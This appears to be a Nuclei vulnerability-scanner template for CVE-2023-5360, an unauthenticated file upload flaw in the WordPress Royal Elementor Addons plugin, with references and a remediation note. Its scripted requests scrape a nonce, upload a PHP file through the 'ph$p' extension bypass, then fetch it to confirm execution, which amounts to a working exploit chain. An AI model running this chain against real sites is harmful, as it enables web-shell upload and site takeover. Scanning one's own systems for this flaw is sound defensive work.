id: CVE-2023-5360 info: name: WordPress Royal Elementor Addons Plugin <= 1.3.78 - Arbitrary File Upload author: theamanrawat severity: critical description: | Arbitrary File Upload vulnerability in WordPress Royal Elementor Addons Plugin. This could allow a malicious actor to upload any type of file to your website. This can include backdoors which are then executed to gain further access to your website. This vulnerability has been fixed in version 1.3.79 remediation: Fixed in 1.3.79 reference: - https://wordpress.org/plugins/royal-elementor-addons/ - https://wpscan.com/vulnerability/281518ff-7816-4007-b712-63aed7828b34/ - https://nvd.nist.gov/vuln/detail/CVE-2023-5360 - https://wpscan.com/vulnerability/281518ff-7816-4007-b712-63aed7828b34 - http://packetstormsecurity.com/files/175992/WordPress-Royal-Elementor-Addons-And-Templates-Remote-Shell-Upload.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-5360 cwe-id: CWE-434 epss-score: 0.96723 epss-percentile: 0.99637 cpe: cpe:2.3:a:royal-elementor-addons:royal_elementor_addons:*:*:*:*:*:wordpress:*:* metadata: verified: "true" max-request: 3 vendor: royal-elementor-addons product: royal_elementor_addons framework: wordpress publicwww-query: "/plugins/royal-elementor-addons/" tags: wpscan,packetstorm,cve,cve2023,rce,wordpress,wp-plugin,wp,royal-elementor-addons,unauth,intrusive variables: file: "{{to_lower(rand_text_alpha(5))}}" http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} - | POST /wp-admin/admin-ajax.php?action=wpr_addons_upload_file HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=---------------------------318949277012917151102295043236 -----------------------------318949277012917151102295043236 Content-Disposition: form-data; name="uploaded_file"; filename="{{file}}.ph$p" Content-Type: image/png -----------------------------318949277012917151102295043236 Content-Disposition: form-data; name="allowed_file_types" ph$p -----------------------------318949277012917151102295043236 Content-Disposition: form-data; name="triggering_event" click -----------------------------318949277012917151102295043236 Content-Disposition: form-data; name="wpr_addons_nonce" {{nonce}} -----------------------------318949277012917151102295043236-- - | GET /wp-content/uploads/wpr-addons/forms/{{filename}}.php HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body_3 words: - "86398d3a90432d24901a7bbdcf1ab2ba" condition: and - type: word part: header_3 words: - "text/html" - type: status status: - 200 extractors: - type: regex name: nonce part: body_1 group: 1 regex: - 'WprConfig\s*=\s*{[^}]*"nonce"\s*:\s*"([^"]*)"' internal: true - type: regex name: filename part: body_2 group: 1 regex: - 'wp-content\\\/uploads\\\/wpr-addons\\\/forms\\\/(.*?).php' internal: true # digest: 4a0a00473045022058942ef07bcf45ed689629dec47cb5948deebabbecb3319b821112bc3e6a891a022100cc582739251f81091738f4d4be969f2005c4f4b94462585d59d708a8ba4aad2b:922c64590222798bb761d5b6d8e72950